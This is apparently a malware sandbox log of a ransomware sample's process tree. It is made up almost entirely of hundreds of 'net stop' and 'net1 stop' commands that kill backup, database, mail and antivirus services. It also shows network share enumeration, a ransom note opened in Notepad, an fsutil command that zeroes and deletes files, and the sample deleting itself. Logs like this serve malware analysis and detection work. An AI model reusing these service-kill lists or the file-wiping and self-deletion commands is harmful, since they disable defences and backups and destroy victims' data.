C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop veeam /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VSNAPVSS /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Health Service” /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeSRS /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop W3Svc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$SYSTEM_BGC /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Veeam Backup Catalog Data Service” /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$TPS /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos File Scanner Service” /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeSA /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop UI0Detect /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$SQL_2008 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Symantec System Recovery” /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mozyprobackup /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ekrn /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop DCAgent /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SHAREPOINT /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AVP /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SBSMONITORING /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SBSMONITORING /3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Antivirus /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PROFXENGAGEMENT /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PROD /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Web Control Service” /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PRACTTICEBGC /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDeviceMediaService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos System Protection Service” /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PRACTICEMGT /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Safestore Service” /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop audioendpointbuilder /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$ECWDB2 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Message Router” /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop unistoresvc_1af40a /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$BKUPEXEC /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ARSM /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos MCS Client” /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msexchangeimap4 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “intel(r) proset monitoring service” /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$TPSAMA /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos MCS Agent” /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msexchangeadtopology /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “aphidmonitorservice” /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$TPS /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Zoolz 2 Service” /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$TPSAMA /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop vapiendpoint /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mssql$vim_sqlexp /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop WRSVC /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLTELEMETRY$ECWDB2 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TrueKeyServiceHelper /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLTELEMETRY /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TrueKeyScheduler /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLSERVERAGENT /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TrueKey /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLSafeOLRService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop tmlisten /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLBrowser /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TmCCSF /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2012 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_update_64 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_update /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$TPSAMA /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_service /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$TPS /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_filter /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SYSTEM_BGC /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop svcGenericHost /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SQLEXPRESS /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SOPHOS /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SQL_2008 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophossps /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SHAREPOINT /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SntpService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SBSMONITORING /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SmcService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PROFXENGAGEMENT /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Smcinst /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PROD /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ShMonitor /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PRACTTICEMGT /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SepMasterService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PRACTTICEBGC /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SAVService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$ECWDB2 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SAVAdminService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$CXDB /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sacsvr /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$CITRIX_METAFRAME /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SOPHOS /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$BKUPEXEC /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sms_site_sql_backup /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfevtp /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RESvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop wbengine /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfemms /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$SQL_2008 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop wbengine /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfefire /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop OracleClientCache80 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McTaskManager /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MySQL80 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamRESTSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McShield /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MySQL57 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeFrameworkMcAfeeFramework /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerOLAPService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamMountSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeFramework /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerADHelper100 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamHvIntegrationSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeEngineService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerADHelper /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamEnterpriseManagerSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MBEndpointAgent /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLSERVER /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploySvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MBAMService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$TPSAMA /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop masvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$TPS /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamCloudSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop macmnsvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamCatalogSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop klnagent /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SQL_2008 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamBrokerSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop kavfsslp /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamBackupSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop KAVFSGT /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLWriter /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop KAVFS /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop FA_Scheduler /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2012 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SDRSVC /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ESHASRV /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EsgShKernel /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$TPSAMA /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ntrtscan /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EPUpdateService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$TPS /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EPSecurityService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SYSTEM_BGC /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$SYSTEM_BGC /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Device Control Service” /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SstpSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msftesql$PROD /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “SQLsafe Filter Service” /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$SQL_2008 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SMTPSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Clean Service” /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeMGMT /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop POP3Svc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MsDtsServer110 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “SQLsafe Backup Service” /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SamSs /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos AutoUpdate Service” /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeIS /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetMsmqActivator /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MsDtsServer100 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “SQL Backups /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Enterprise Client Service” /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EraserSvc11710 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Agent” /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeES /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop IISAdmin /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MsDtsServer /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Acronis VSS Provider” /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophos /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CAARCUpdateSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CASAD2DWebSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDiveciMediaService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBIDPService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBFCService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RTVscan /y3⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c net view3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop DefWatch /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooIT /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooBackup /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBCFMonitorService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BMR Boot Service /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.643⤵
-
C:\Windows\SysWOW64\notepad.exe"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt3⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”3⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.7 -n 34⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Programs\Temp\wqm58yk7.exe3⤵
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooBackup /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DefWatch /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooIT /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s upnphost1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBFCService /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SOPHOS /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBIDPService /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RTVscan /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SDRSVC /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Agent” /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SntpService /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_filter /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_update /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ShMonitor /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$CXDB /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sacsvr /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLWriter /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop vapiendpoint /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Message Router” /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop UI0Detect /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DCAgent /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop unistoresvc_1af40a /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos File Scanner Service” /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop veeam /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfefire /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfevtp /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop KAVFS /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McShield /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wbengine /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MBAMService /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop macmnsvc /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Acronis VSS Provider” /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop masvc /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MySQL57 /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wbengine /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sms_site_sql_backup /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Antivirus /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Smcinst /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Web Control Service” /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SAVService /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop tmlisten /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ekrn /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SMTPSvc /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfemms /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop kavfsslp /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MySQL80 /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McTaskManager /y1⤵
-
